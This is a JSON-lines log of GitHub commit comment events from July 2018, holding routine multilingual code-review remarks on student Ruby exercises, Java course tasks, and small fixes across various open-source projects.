{"id":"7980961310","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744755,"position":8,"line":8,"path":"Lesson1/right_triangle.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:45:23Z","updated_at":"2018-07-18T06:45:23Z","author_association":"NONE","body":"в массиве оставляй пробел после запятой, а то все мешается и тяжело читать"}},"created_at":"2018-07-18T06:45:23Z"}
{"id":"7980962573","type":"CommitCommentEvent","actor":{"login":"ultrabug"},"repo":{"name":"ultrabug/py3status"},"payload":{"comment":{"id":29744757,"position":null,"line":null,"path":null,"commit_id":"e3a189b03e81bf446ef37e424ad3ea7a11a92c2a","created_at":"2018-07-18T06:45:42Z","updated_at":"2018-07-18T06:45:42Z","author_association":"OWNER","body":"Hello guys, sorry for the late reply. I released 3.11 just before going for a bit of vacation.\r\n\r\n@lasers I trust and value you very much even if my response time is not the best, once again I apologize for this. I hear what you say @maximbaz and for full disclosure @cyrinux has told me something similar.\r\n\r\nI will not do collaborator status for a day, either you have the rights or you don't. This is a relationship that needs to be discussed directly as we did with @tobes before he became collaborator.\r\n\r\nThat's why I think github is not the place for this conversation to happen. IRC is, and I will be very pleased to have a chat with you there.\r\n\r\nPlease try to be around and ping me there @lasers we'll sort this very quickly. We just need to \"meet and commit together\" :+1: \r\n\r\nKindly"}},"created_at":"2018-07-18T06:45:42Z"}
{"id":"7980966501","type":"CommitCommentEvent","actor":{"login":"wmkhoo"},"repo":{"name":"wmkhoo/taintgrind"},"payload":{"comment":{"id":29744763,"position":null,"line":null,"path":null,"commit_id":"6f55ff9fc19329790ef3b59e5756e04dfad68fb6","created_at":"2018-07-18T06:46:46Z","updated_at":"2018-07-18T06:46:46Z","author_association":"OWNER","body":"Thanks @lmrs2!"}},"created_at":"2018-07-18T06:46:46Z"}
{"id":"7980971213","type":"CommitCommentEvent","actor":{"login":"creativechik"},"repo":{"name":"andreytlt13/FaceAnalytics"},"payload":{"comment":{"id":29744776,"position":69,"line":110,"path":"srv/webapp/camera_display/video_streaming.py","commit_id":"f43e264782ce1eb1691c2df26148cf9a9b492646","created_at":"2018-07-18T06:48:02Z","updated_at":"2018-07-18T06:48:02Z","author_association":"COLLABORATOR","body":"Looks like this is a bit out-dated because now (at least since version '3.4.1') openCV already reads image in RGB. And by applying this 'bgr_rgb' conversion we actually introduce some messy colours :)"}},"created_at":"2018-07-18T06:48:02Z"}
{"id":"7980971387","type":"CommitCommentEvent","actor":{"login":"cyberpirate92"},"repo":{"name":"rajeevdesai/emails-regex"},"payload":{"comment":{"id":29744777,"position":null,"line":null,"path":null,"commit_id":"a029b1395d59a3c9dd64664e399bfeecd5aa20ba","created_at":"2018-07-18T06:48:05Z","updated_at":"2018-07-18T06:48:05Z","author_association":"CONTRIBUTOR","body":"[`npm version`](https://docs.npmjs.com/cli/version) can be used be used so that this part could be automated using CI whenever a successful build happens in the master branch,"}},"created_at":"2018-07-18T06:48:05Z"}
{"id":"7980972387","type":"CommitCommentEvent","actor":{"login":"tonypee"},"repo":{"name":"crazycodeboy/react-native-splash-screen"},"payload":{"comment":{"id":29744780,"position":null,"line":null,"path":null,"commit_id":"69187cc22d16fb22ab461988df4d805f21c174a8","created_at":"2018-07-18T06:48:20Z","updated_at":"2018-07-18T06:48:20Z","author_association":"NONE","body":"should this be [RNSplashScreen show]?"}},"created_at":"2018-07-18T06:48:20Z"}
{"id":"7980974225","type":"CommitCommentEvent","actor":{"login":"Arxos0012"},"repo":{"name":"gabemgem/CSE-REU2018"},"payload":{"comment":{"id":29744781,"position":null,"line":null,"path":null,"commit_id":"0ff8e9577db02d270a5439ada9058a00b079be69","created_at":"2018-07-18T06:48:51Z","updated_at":"2018-07-18T06:48:51Z","author_association":"COLLABORATOR","body":"Meant to say: Changed lg to round log2 up rather down "}},"created_at":"2018-07-18T06:48:51Z"}
{"id":"7980984130","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29744801,"position":null,"line":null,"path":null,"commit_id":"6f584d4bf02dcf2d230e0b366c7051377cba6ace","created_at":"2018-07-18T06:51:30Z","updated_at":"2018-07-18T06:51:30Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-298](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-298).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-298-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-18T06:51:30Z"}
{"id":"7980990032","type":"CommitCommentEvent","actor":{"login":"gtl90"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29744828,"position":2,"line":1,"path":"README.md","commit_id":"16b8325496b38fb968899c2321699029f836a3e2","created_at":"2018-07-18T06:53:02Z","updated_at":"2018-07-18T06:53:02Z","author_association":"COLLABORATOR","body":"Hi Ivo\n\n\nThanks it was a long day yesterday - couldn't see for looking why it wasn't working.\n\n\nKind regards\n\n\nGeorgina\n\n\n________________________________\nFrom: Ivo Ulrich <notifications@github.com>\nSent: 18 July 2018 06:30\nTo: Bahmni/person-management-app\nCc: Georgina Hodgkinson; Mention\nSubject: Re: [Bahmni/person-management-app] Update README.md (16b8325)\n\n\n@gtl90<https://github.com/gtl90> please use this [![Build Status](https://travis-ci.com/Bahmni/person-management-app.svg?branch=master)](https://travis-ci.com/Bahmni/person-management-app)\n\nthe current one is wrong, if you click on it in the readme you will see that travis-ci.org says the repo is not active. it is active in travis-ci.com\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/Bahmni/person-management-app/commit/16b8325496b38fb968899c2321699029f836a3e2#commitcomment-29744632>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ALLnVSSQuoLks_3zOJZ-8JlkZDa9MHSvks5uHtYNgaJpZM4VUBJW>.\n"}},"created_at":"2018-07-18T06:53:02Z"}
{"id":"7980993236","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744832,"position":7,"line":7,"path":"app/src/main/res/layout/news_item.xml","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:53:56Z","updated_at":"2018-07-18T06:53:56Z","author_association":"OWNER","body":"Done. Used it in code."}},"created_at":"2018-07-18T06:53:56Z"}
{"id":"7980995339","type":"CommitCommentEvent","actor":{"login":"laborleben"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29744835,"position":22,"line":202,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-18T06:54:29Z","updated_at":"2018-07-18T06:54:29Z","author_association":"MEMBER","body":"I would think the opposite way: initialization to zero hides bugs better.\r\n\r\nAnyways, it doesn't matter because only the part of the array is returned that has the values set."}},"created_at":"2018-07-18T06:54:29Z"}
{"id":"7980996087","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744837,"position":null,"line":null,"path":null,"commit_id":"7af396cf3b8886d91484cb001af06516e045be66","created_at":"2018-07-18T06:54:42Z","updated_at":"2018-07-18T06:54:42Z","author_association":"OWNER","body":"Task6\r\nexample 6 for courses Java\r\n\r\nНаписать программу, которая рандомно генерирует массив 2-ух значных чисел длины N (вводится вручную) и выводит наименьшее и наибольшее число из списка."}},"created_at":"2018-07-18T06:54:42Z"}
{"id":"7980997593","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744842,"position":10,"line":10,"path":"Lesson1/right_triangle.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:55:07Z","updated_at":"2018-07-18T06:55:07Z","author_association":"NONE","body":"Давай избавимся от вложенных условий. Их следует избегать по возможности. Что-б прочесть вложенные условия, постоянно нужно помнить контекст в котором мы находимся.  И что-б понять, что в другой ветке происходит - приходится начинать заново. Вообщем, увеличивается цикломатическая сложность кода. \r\n\r\n```\r\nif (side_array.uniq.size == 1)\r\n```\r\nЛучше вынести сразу после определения side_array. Внутри блока вывести сообщение о том, что треугольник равносторонний и прекратить выполнение программы. Потому-что дальнейшее ее выполнение не имеет смысла"}},"created_at":"2018-07-18T06:55:07Z"}
{"id":"7981001807","type":"CommitCommentEvent","actor":{"login":"ggarri"},"repo":{"name":"cosmos/ethermint"},"payload":{"comment":{"id":29744854,"position":4,"line":6,"path":"state/database.go","commit_id":"4ba51125bb19fb75f2d1e5cee518994c90d3fd0d","created_at":"2018-07-18T06:56:12Z","updated_at":"2018-07-18T06:56:12Z","author_association":"NONE","body":"Import is dedupe (see line above), I don't see the need for it"}},"created_at":"2018-07-18T06:56:12Z"}
{"id":"7981007870","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744868,"position":11,"line":11,"path":"Lesson1/right_triangle.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:57:40Z","updated_at":"2018-07-18T06:57:40Z","author_association":"NONE","body":"Дальше вычисление Пифагора можно вынести в переменную. Которая будет возвращать true/false. То есть в принципе в том-же виде, в котором она сейчас есть."}},"created_at":"2018-07-18T06:57:40Z"}
{"id":"7981010217","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744884,"position":11,"line":11,"path":"Lesson1/right_triangle.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:58:14Z","updated_at":"2018-07-18T06:58:14Z","author_association":"NONE","body":"И тут вместо вычислений используй эту переменную"}},"created_at":"2018-07-18T06:58:14Z"}
{"id":"7981012418","type":"CommitCommentEvent","actor":{"login":"ru1996"},"repo":{"name":"wooloba/LeetCode861Challenge"},"payload":{"comment":{"id":29744891,"position":10,"line":10,"path":"findRedundantConnection.py","commit_id":"b8885d6c424da82f8c50eda21f2f042910c8e777","created_at":"2018-07-18T06:58:50Z","updated_at":"2018-07-18T06:58:50Z","author_association":"NONE","body":"Where is the code?"}},"created_at":"2018-07-18T06:58:50Z"}
{"id":"7981014563","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744901,"position":13,"line":13,"path":"Lesson1/right_triangle.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:59:24Z","updated_at":"2018-07-18T06:59:24Z","author_association":"NONE","body":"Здесь можно использовать elsif, и скомбинировать с проверкой на прямоугольность"}},"created_at":"2018-07-18T06:59:24Z"}
{"id":"7981016721","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29744907,"position":5,"line":102,"path":"src/main/java/ml/duncte123/skybot/SkyBot.java","commit_id":"2705b03499a707b3b96e3746352815f999d2a604","created_at":"2018-07-18T06:59:57Z","updated_at":"2018-07-18T06:59:57Z","author_association":"MEMBER","body":"Undo this"}},"created_at":"2018-07-18T06:59:57Z"}
{"id":"7981018105","type":"CommitCommentEvent","actor":{"login":"kentaza"},"repo":{"name":"up1/course-introduction-docker"},"payload":{"comment":{"id":29744921,"position":null,"line":null,"path":null,"commit_id":"2daa9082b79b4a644c74fc293582c29ac109b8b6","created_at":"2018-07-18T07:00:16Z","updated_at":"2018-07-18T07:00:16Z","author_association":"NONE","body":"อ. มี command ที่ตอนทำ Workshop วันที่  17/07/2018 ด้วยไหมครับ"}},"created_at":"2018-07-18T07:00:16Z"}
{"id":"7981020335","type":"CommitCommentEvent","actor":{"login":"Khrin"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29744930,"position":5,"line":281,"path":"fanboy-addon/fanboy_cookie_general_block.txt","commit_id":"1070e49627487bcf768d391b1e1f4c84bb6d19ea","created_at":"2018-07-18T07:00:48Z","updated_at":"2018-07-18T07:00:48Z","author_association":"MEMBER","body":"Removed, thanks."}},"created_at":"2018-07-18T07:00:48Z"}
{"id":"7981025111","type":"CommitCommentEvent","actor":{"login":"DaeDalusss"},"repo":{"name":"DaeDalusss/GoGoGo"},"payload":{"comment":{"id":29744950,"position":null,"line":null,"path":null,"commit_id":"bbb7bdb4a22d55587cf99c231a459191d586bd20","created_at":"2018-07-18T07:02:01Z","updated_at":"2018-07-18T07:02:01Z","author_association":"OWNER","body":"学习go 语言\r\n"}},"created_at":"2018-07-18T07:02:01Z"}
{"id":"7981032464","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"yakamara/ydeploy"},"payload":{"comment":{"id":29744969,"position":null,"line":null,"path":null,"commit_id":"785d5afbf5107d7dabe4e6ba2509bc099a90aba4","created_at":"2018-07-18T07:03:54Z","updated_at":"2018-07-18T07:03:54Z","author_association":"CONTRIBUTOR","body":"Wäre es möglich mit einer konfig datei tabellen/spalten zu definieren die beim abholen anonymisiert werden wg dsgvo? (Z.b. Mit Faker)"}},"created_at":"2018-07-18T07:03:54Z"}
{"id":"7981040040","type":"CommitCommentEvent","actor":{"login":"Vojtech-Sassmann"},"repo":{"name":"CESNET/perun"},"payload":{"comment":{"id":29744975,"position":null,"line":null,"path":null,"commit_id":"1511d1320e60c435672b8867e1672c4c771ff80f","created_at":"2018-07-18T07:05:45Z","updated_at":"2018-07-18T07:05:45Z","author_association":"CONTRIBUTOR","body":"Since you are fixing things from your previous commit, you should ammend these changes and not create a new commit. "}},"created_at":"2018-07-18T07:05:45Z"}
{"id":"7981041043","type":"CommitCommentEvent","actor":{"login":"zhangbing3"},"repo":{"name":"ElemeFE/element"},"payload":{"comment":{"id":29744977,"position":null,"line":null,"path":null,"commit_id":"f18b55ecd87d0720ba75ee584c8dcec61c782664","created_at":"2018-07-18T07:06:00Z","updated_at":"2018-07-18T07:06:00Z","author_association":"NONE","body":"#12037  fixing the el.contans error"}},"created_at":"2018-07-18T07:06:00Z"}
{"id":"7981041360","type":"CommitCommentEvent","actor":{"login":"zhan-yl"},"repo":{"name":"zhan-yl/gogo-service"},"payload":{"comment":{"id":29744978,"position":null,"line":null,"path":null,"commit_id":"cd37c261db76e0d8ae4a5e89305022f404eb5977","created_at":"2018-07-18T07:06:05Z","updated_at":"2018-07-18T07:06:05Z","author_association":"OWNER","body":"changed some typo"}},"created_at":"2018-07-18T07:06:05Z"}
{"id":"7981043255","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744982,"position":null,"line":null,"path":null,"commit_id":"e546a059296a9cd2f35800ffea7da7f5588d9497","created_at":"2018-07-18T07:06:34Z","updated_at":"2018-07-18T07:06:34Z","author_association":"OWNER","body":"Task7\r\nexample 7 for courses Java\r\n\r\nНаписать программу, которая проверяет три отрезка на возможность создать прямоугольного треугольника. Длина отрезков вводится вручную."}},"created_at":"2018-07-18T07:06:34Z"}
{"id":"7981053226","type":"CommitCommentEvent","actor":{"login":"dimashmundiak"},"repo":{"name":"dimashmundiak/node-paypal-sub"},"payload":{"comment":{"id":29745002,"position":null,"line":null,"path":null,"commit_id":"448f2f5d92b9da8f5d71eb048a6c96ea0dcc5ec9","created_at":"2018-07-18T07:09:03Z","updated_at":"2018-07-18T07:09:03Z","author_association":"OWNER","body":"The problem is receiving webhooks on localhost\r\nYou need either deploy app to some server or tunnel webhook to your localhost url [by](https://ngrok.com) ngrok or any alternative"}},"created_at":"2018-07-18T07:09:03Z"}
{"id":"7981055480","type":"CommitCommentEvent","actor":{"login":"adamretter"},"repo":{"name":"eXist-db/exist-xqts-runner"},"payload":{"comment":{"id":29745012,"position":null,"line":null,"path":null,"commit_id":"9efb187c343bbff9fac67e49d59b717299a0c45e","created_at":"2018-07-18T07:09:36Z","updated_at":"2018-07-18T07:09:36Z","author_association":"MEMBER","body":"@joewiz thanks :-)"}},"created_at":"2018-07-18T07:09:36Z"}
{"id":"7981056525","type":"CommitCommentEvent","actor":{"login":"benbuck"},"repo":{"name":"LiuChangFreeman/rbtray"},"payload":{"comment":{"id":29745013,"position":null,"line":null,"path":null,"commit_id":"ee1f2cc21168c72f44a16caf437e3302c594e31b","created_at":"2018-07-18T07:09:52Z","updated_at":"2018-07-18T07:09:52Z","author_association":"NONE","body":"Hi LiuChang,\r\n\r\nI see the problem, the LTEXT control in the About dialog won't hold more than 256 characters, but if you split it into multiple LTEXT controls, you can add your name without removing mine:\r\n\r\n```\r\ndiff --git a/RBTray.rc b/RBTray.rc\r\nindex 5bdb714..c7a2c29 100644\r\n--- a/RBTray.rc\r\n+++ b/RBTray.rc\r\n@@ -52,14 +52,18 @@ END\r\n // Dialog\r\n //\r\n\r\n-IDD_ABOUT DIALOGEX 0, 0, 199, 163\r\n+IDD_ABOUT DIALOGEX 0, 0, 199, 140\r\n STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | DS_CENTER | WS_POPUP | WS_CAPTION | WS_SYSMENU\r\n CAPTION \"About RBTray\"\r\n FONT 8, \"MS Shell Dlg\", 400, 0, 0x1\r\n BEGIN\r\n-    DEFPUSHBUTTON   \"OK\",IDOK,75,146,50,14\r\n+    DEFPUSHBUTTON   \"OK\",IDOK,75,123,50,14\r\n     ICON            IDI_RBTRAY,IDC_STATIC,7,7,20,20\r\n-    LTEXT           \"RBTray 4.7.1\\r\\nFreeware\\r\\n\\r\\nThis program is distributed under the terms of the GNU General Public License.\\r\\n\\r\\nCopyright ?1998-2018\\r\\n\\r\\nNikolay Redko\\r\\nhttp://rbtray.sourceforge.net/\\r\\n\\r\\nJ.D. Purcell\\r\\nhttp://www.moitah.net/\\r\\n\\r\\nliuchangfreeman\\r\\nwww.tjservice.cn\",IDC_STATIC,38,7,151,132\r\n+    LTEXT           \"RBTray 4.7.1\\r\\nFreeware\\r\\n\\r\\nThis program is distributed under the terms of the GNU General Public License.\\r\\n\\r\\nCopyright ?1998-2018\",IDC_STATIC,38,7,151,16\r\n+    LTEXT           \"Nikolay Redko\\r\\nhttp://rbtray.sourceforge.net/\",IDC_STATIC,38,27,151,16\r\n+    LTEXT           \"J.D. Purcell\\r\\nhttp://www.moitah.net/\",IDC_STATIC,38,47,151,16\r\n+    LTEXT           \"Benbuck Nason\\r\\nhttps://github.com/benbuck/rbtray-code\",IDC_STATIC,38,67,151,16\r\n+    LTEXT           \"liuchangfreeman\\r\\nwww.tjservice.cn\",IDC_STATIC,38,87,151,16\r\n END\r\n\r\n\r\n@@ -116,7 +120,7 @@ BEGIN\r\n             VALUE \"FileDescription\", \"RBTray\"\r\n             VALUE \"FileVersion\", \"4, 7, 1, 0\"\r\n             VALUE \"InternalName\", \"RBTray\"\r\n-            VALUE \"LegalCopyright\", \"Copyright ?1998-2018 Nikolay Redko, J.D. Purcell, liuchangfreeman\"\r\n+            VALUE \"LegalCopyright\", \"Copyright ?1998-2018 Nikolay Redko, J.D. Purcell, Benbuck Nason, liuchangfreeman\"\r\n             VALUE \"OriginalFilename\", \"RBTray.exe\"\r\n             VALUE \"ProductName\", \"RBTray\"\r\n             VALUE \"ProductVersion\", \"4, 7, 1, 0\"\r\n\r\n```\r\nWould you mind please putting something like this back in to restore my name?\r\n\r\nThanks,\r\nBen"}},"created_at":"2018-07-18T07:09:52Z"}
{"id":"7981058747","type":"CommitCommentEvent","actor":{"login":"sauterl"},"repo":{"name":"sauterl/cineast"},"payload":{"comment":{"id":29745020,"position":74,"line":154,"path":"src/org/vitrivr/cineast/core/data/GpsData.java","commit_id":"f0f19737a224aa12e716d2d6ecfe9e86e971b940","created_at":"2018-07-18T07:10:25Z","updated_at":"2018-07-18T07:10:25Z","author_association":"OWNER","body":"Which leads to the need of a _date accuracy_ metadata entry under the `TIME` domain.\r\nOtherwise clients may consider these estimates as given facts"}},"created_at":"2018-07-18T07:10:25Z"}
{"id":"7981059400","type":"CommitCommentEvent","actor":{"login":"abbayosua"},"repo":{"name":"abbayosua/glintstodo"},"payload":{"comment":{"id":29745022,"position":20,"line":20,"path":"index.css","commit_id":"1116b08fd4847c00fbef5e7b771c82517b38f820","created_at":"2018-07-18T07:10:35Z","updated_at":"2018-07-18T07:10:35Z","author_association":"OWNER","body":"apakah ini sudah benar? @Hazeorid #issue"}},"created_at":"2018-07-18T07:10:35Z"}
{"id":"7981064432","type":"CommitCommentEvent","actor":{"login":"bornabesic"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29745050,"position":null,"line":null,"path":null,"commit_id":"3d3939a1b92cf208c32bdf789e1898f8065cbbf0","created_at":"2018-07-18T07:11:51Z","updated_at":"2018-07-18T07:11:51Z","author_association":"OWNER","body":"If we already have separated databases, isn't it redundant to mark each node with the species label?"}},"created_at":"2018-07-18T07:11:51Z"}
{"id":"7981064493","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29745051,"position":null,"line":null,"path":null,"commit_id":"0fc111ee2b826aa0e0f05e2789465041409a557e","created_at":"2018-07-18T07:11:52Z","updated_at":"2018-07-18T07:11:52Z","author_association":"OWNER","body":"Task8\r\nTask for courses on Java\r\n\r\nСоздать программу, которая подсчитывает сколько раз употребляется слово в тексте (без учета регистра) . Текст и слово вводится вручную."}},"created_at":"2018-07-18T07:11:52Z"}
{"id":"7981065331","type":"CommitCommentEvent","actor":{"login":"aliagcaoili"},"repo":{"name":"aliagcaoili/SamsungA6-2018"},"payload":{"comment":{"id":29745055,"position":null,"line":null,"path":null,"commit_id":"8bd9b64c41ae772fe31efd287cd868c4ea05c06e","created_at":"2018-07-18T07:12:05Z","updated_at":"2018-07-18T07:12:05Z","author_association":"OWNER","body":"a lot of fixes need"}},"created_at":"2018-07-18T07:12:05Z"}
{"id":"7981068828","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":29745069,"position":null,"line":null,"path":null,"commit_id":"9bd723ddada4f8f730c1b41b7fdf4a0a29da15e8","created_at":"2018-07-18T07:12:53Z","updated_at":"2018-07-18T07:12:53Z","author_association":"MEMBER","body":"@mbhave on the call we've discussed the possibility to have a richer message (that mentions `ServerWebExchange`). Did you change your mind?"}},"created_at":"2018-07-18T07:12:53Z"}
{"id":"7981074203","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745077,"position":9,"line":9,"path":"Lesson_1/r_triangle.rb","commit_id":"eba7a12356d30f73a7c04684c5ed3712de5991e1","created_at":"2018-07-18T07:14:11Z","updated_at":"2018-07-18T07:14:11Z","author_association":"NONE","body":"Настрой редактор на отступ ровно в 2 пробела, именно так принято в ruby. Причем, именно пробела, а не таба. Т.е. должна быть замена табов на пробелы, т.н. soft tabs. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-18T07:14:11Z"}
{"id":"7981074939","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29745080,"position":null,"line":null,"path":null,"commit_id":"21e2dcb1cd1cc318384b860d0d65d912a8e58e3d","created_at":"2018-07-18T07:14:22Z","updated_at":"2018-07-18T07:14:22Z","author_association":"OWNER","body":"Task9\r\nexample 9 for courses Java\r\n\r\nНеобходимо написать программу, которая проверяет слово на \"палиндромность\". Слово для проверки вводится вручную во время выполнения программы."}},"created_at":"2018-07-18T07:14:22Z"}
{"id":"7981083341","type":"CommitCommentEvent","actor":{"login":"szuro"},"repo":{"name":"HenriqueCaires/ZabbixApi"},"payload":{"comment":{"id":29745105,"position":null,"line":null,"path":null,"commit_id":"22685198f09f04e2e46447fa4f16fa6e3f98d416","created_at":"2018-07-18T07:16:27Z","updated_at":"2018-07-18T07:16:27Z","author_association":"NONE","body":"> \"delay\": \"86400\"\r\n\r\nis a string by JSON specification standards\r\n\r\n> \"delay\": 86400\r\n\r\nwould be an int.\r\n\r\nAs per your suggestion, I will create an issue for this."}},"created_at":"2018-07-18T07:16:27Z"}
{"id":"7981085293","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745110,"position":11,"line":11,"path":"Lesson_1/r_triangle.rb","commit_id":"eba7a12356d30f73a7c04684c5ed3712de5991e1","created_at":"2018-07-18T07:16:56Z","updated_at":"2018-07-18T07:16:56Z","author_association":"NONE","body":"Пока очень сложно получилось. Лучше сначала определить большую сторону и потом посчитать теорему пифагора, нежели считать сразу для всех случаев. И рекомендую это сделать с помощью метода sort для массивов\r\nhttps://apidock.com/ruby/Array/sort"}},"created_at":"2018-07-18T07:16:56Z"}
{"id":"7981087144","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29745114,"position":null,"line":null,"path":null,"commit_id":"3d3939a1b92cf208c32bdf789e1898f8065cbbf0","created_at":"2018-07-18T07:17:22Z","updated_at":"2018-07-18T07:17:22Z","author_association":"COLLABORATOR","body":"my idea is to have the corresponding graphs of different species in one database.\r\n\r\nthen with the species label, I can pull corresponding species sets and compare them.\r\n\r\nagain, the design needs to be tested repeatedly to have the optimal one to serve practical usage."}},"created_at":"2018-07-18T07:17:22Z"}
{"id":"7981092961","type":"CommitCommentEvent","actor":{"login":"amulyakashyap09"},"repo":{"name":"amulyakashyap09/colors"},"payload":{"comment":{"id":29745128,"position":null,"line":null,"path":null,"commit_id":"79962d45e7cb38d3c184a4876a3861b2fc692024","created_at":"2018-07-18T07:18:45Z","updated_at":"2018-07-18T07:18:45Z","author_association":"OWNER","body":"Theme changed"}},"created_at":"2018-07-18T07:18:45Z"}
{"id":"7981094692","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745133,"position":32,"line":32,"path":"Lesson_1/r_triangle.rb","commit_id":"eba7a12356d30f73a7c04684c5ed3712de5991e1","created_at":"2018-07-18T07:19:10Z","updated_at":"2018-07-18T07:19:10Z","author_association":"NONE","body":"Вот эту проверку имеет смысл вытащить вообще из блока, и написать ее раньше. Потому-что, если треугольнгик равносторонний, то он не может быть прямоугольным. И нам бы хотелось прервать выполнение программы на этом этапе, что-б избежать дальнейших вычислений"}},"created_at":"2018-07-18T07:19:10Z"}
{"id":"7981097164","type":"CommitCommentEvent","actor":{"login":"melissachen2000"},"repo":{"name":"melissachen2000/colorize"},"payload":{"comment":{"id":29745138,"position":null,"line":null,"path":null,"commit_id":"1687ed780aaad1dc25366841e7b7ad9ea770a392","created_at":"2018-07-18T07:19:47Z","updated_at":"2018-07-18T07:19:47Z","author_association":"OWNER","body":"Python files used to create the dataset, part 2"}},"created_at":"2018-07-18T07:19:47Z"}
{"id":"7981102265","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29745149,"position":38,"line":899,"path":"lisp/magit-mode.el","commit_id":"bbee428073e8972ea62b92f210189800be626ccd","created_at":"2018-07-18T07:21:00Z","updated_at":"2018-07-18T07:21:00Z","author_association":"MEMBER","body":"@vermiculus This should have been `funcall`, since Emacs always uses `(funcall customizable-function ...)` in such cases. I intend to fix this -- tell me when you are available to coordinate this change."}},"created_at":"2018-07-18T07:21:00Z"}
{"id":"7981105240","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745154,"position":12,"line":12,"path":"Lesson_1/r_triangle.rb","commit_id":"eba7a12356d30f73a7c04684c5ed3712de5991e1","created_at":"2018-07-18T07:21:44Z","updated_at":"2018-07-18T07:21:44Z","author_association":"NONE","body":"Оператор возведения в степень - это единственный оператор вокруг которого пробелы не ставятся."}},"created_at":"2018-07-18T07:21:44Z"}
{"id":"7981106839","type":"CommitCommentEvent","actor":{"login":"bestmoon"},"repo":{"name":"txdywy/flask"},"payload":{"comment":{"id":29745155,"position":8,"line":40,"path":"examples/minitwit/stock.py","commit_id":"b9cafb971b2e3a0bfe3ec78ec1c7e39b2da19c53","created_at":"2018-07-18T07:22:07Z","updated_at":"2018-07-18T07:22:07Z","author_association":"COLLABORATOR","body":"what the meaning of the 3rd column (0.5, 0.75)?"}},"created_at":"2018-07-18T07:22:07Z"}
{"id":"7981138261","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745209,"position":27,"line":27,"path":"Lesson_1/quadratic_equation.rb","commit_id":"10aca25d7a40eb2fa9dc1866a6726585f8fe7adf","created_at":"2018-07-18T07:29:22Z","updated_at":"2018-07-18T07:29:22Z","author_association":"NONE","body":"И настроить редактор на 2 пробела вместо табов нужно. Я вроде писал в другом комите. Нужно будет везде поправить"}},"created_at":"2018-07-18T07:29:22Z"}
{"id":"7981138525","type":"CommitCommentEvent","actor":{"login":"learningxmh"},"repo":{"name":"learningxmh/github-slideshow"},"payload":{"comment":{"id":29745210,"position":null,"line":null,"path":null,"commit_id":"9b8dae9f197c36b7a4165ed365575bfb13601528","created_at":"2018-07-18T07:29:27Z","updated_at":"2018-07-18T07:29:27Z","author_association":"OWNER","body":"add"}},"created_at":"2018-07-18T07:29:27Z"}
